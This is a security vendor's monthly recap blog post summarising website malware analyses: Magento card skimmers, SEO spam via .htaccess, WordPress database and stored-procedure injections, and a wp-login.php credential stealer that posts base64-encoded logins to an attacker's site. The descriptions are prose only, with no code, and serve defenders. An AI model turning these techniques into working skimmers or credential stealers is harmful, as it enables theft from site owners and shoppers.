Labs Notes Monthly Recap

Time for another monthly recap! If you haven’t seen the other monthly recaps, make sure to check out October and September. Our malware research and incident response teams publish technical content in the Sucuri Labs Notes. The knowledge and recommendations are useful to keep your website and visitors safe.

This month we saw a large variety of cases being analyzed by our team, including some interesting SEO spam techniques, malware-injected databases, and conditional malware targeting specific mobile platforms.

Credit card skimmers are the primary issue that we have been writing about, especially with the holidays getting closer. More online shopping means more chances for the bad guys to have access to credit card information.

Geo location and Credit Card Data Stolen from Magento

Krasimir Konov

Normally we see credit card details being stolen and emailed to attackers, or stored in a text file on the server. We have raised awareness about these types of ecommerce hacks in the past. Here we are seeing geo-location information (IP Address, Country, Region, City) added as a malicious variable, $datasend, along with sensitive credit card info.

Magento hackers are specifically using the mail() function on compromised servers. An integrity monitoring service can easily detect the file modifications and allow for quick recovery of hacked Magento sites.

Spam SEO Injector Circumventing Defense Techniques

Luke Leal

Here we analyze a hack that adds a rewrite rule to the .htaccess file, which causes an SEO spam payload to be delivered to certain visitors who request HTML files in a specific directory.

By checking the request headers for IP addresses, HTTP referrers, and the HTTP useragent, the spammers can send the spam only to visitors coming from search engines. If the prerequisites aren’t met, the spammers send the visitors to their affiliate link instead of the SEO spam content.

These attackers included a function which prevents many security plugins and extensions from mitigating the attack. If the security tool uses the file extension .suspected to quarantine suspicious files, the malware will change the file back to a PHP extension.

Malware DB Injection Called via Theme File

Krasimir Konov

Most often we find SEO spam hidden and generated within the file structure. In this post, we analyze a well-hidden database injection inside the themes_config option of a WordPress database. The malware is called from the database using the get_option() function inside of a theme file. From there, the script injected into the database checks the referral headers for specific useragents who receive the spam content.

Using a good website firewall can help prevent this kind of database injection from happening in the first place.

The Tale of a Malicious Stored Procedure

Douglas Santos

Most database injections are related to spam, but in this case our analysts found a stored procedure in the database. When executed, it writes a PHP uploader into WordPress using the fake filename wp-includes/class-wp-change.php

If anyone attempts to remove the file, the stored procedure in the DB regenerates the file. This allows the attackers to retain access to the site and continue their malware campaign. We are seeing a lot of self-replicating malware like this, which makes it difficult for admins to clean their infected sites.

Malware Targets Mobile Platforms

Cesar Anjos

Spammers use conditional malware that detects the type of device that users are browsing on in order to deliver mobile-specific malvertising and web spam. We look at a malware injection inside a WordPress header.php file that redirects users to malicious mobile downloads and pop-up spam.

Our free online scanner SiteCheck runs several scans to emulate different user agents. This allows you to detect problems on your site that may only be visible to visitors coming from certain countries, browsers, referrers, and devices.

Multiple UNIX Users Symbolic Link Injector

Yuliyan Tsvetkov

This malware infects Linux servers and injects symbolic links in every home folder, and first confirms that the server is Linux with the symlink function enabled on the PHP engine. We are seeing this campaign being used for defacements via a .htaccess redirect.

On a shared server, this infection can quickly spread to all sites on the server through these symlinks.

The infection avoids detection and blacklisting by search engines, because it redirects requests from those useragents to a 404 page.

Malicious Routine Stealing WordPress Credentials in the Wild

Douglas Santos

We have covered a few incidents where attackers steal login credentials to a website and either email them to themselves, or store the credentials in a file on the server.

This time, we look at a piece of malware that sends the compromised login and password to an external site controlled by the attacker. Rather than using the mail() function or creating a curl request, attackers injected a single line of malware inside the wp-login.php file that uses the function file_get_contents() to post the username and password to the remote website, encoded in base64, making it difficult for someone to notice it.

Unwanted Sex Toys Advertisement

Eugene Wozniak

This incident affected an HTML-based website. Normally we write about malware affecting a particular CMS, but in this case it is a static site suffering from the infection. It’s important to note that these sites are also targets of attacks.

The website was showing unwanted floating banners advertising sex toys. The malware itself used JS Packer compression to obfuscate the payload, and could be injected into several HTML pages on the website.

New Version of Magento Credit Card Stealer in the Wild

Cesar Anjos

Credit card stealers continue to evolve and put ecommerce sites at risk. This new variant of malware intercepts credit card data being sent to PayPal by the Magento file: app/code/core/Mage/Paypal/Model/Direct.php

We recognized the gmail account as the same attacker who has received stolen credentials in the past.

Another variant uses the file app/code/core/Mage/Checkout/Model/Type/Onepage.php to intercept data using the OnePage checkout module.

Labs Notes Monthly Recap – Nov/2016

About Estevao Avillez

About Estevao Avillez

Reader Interactions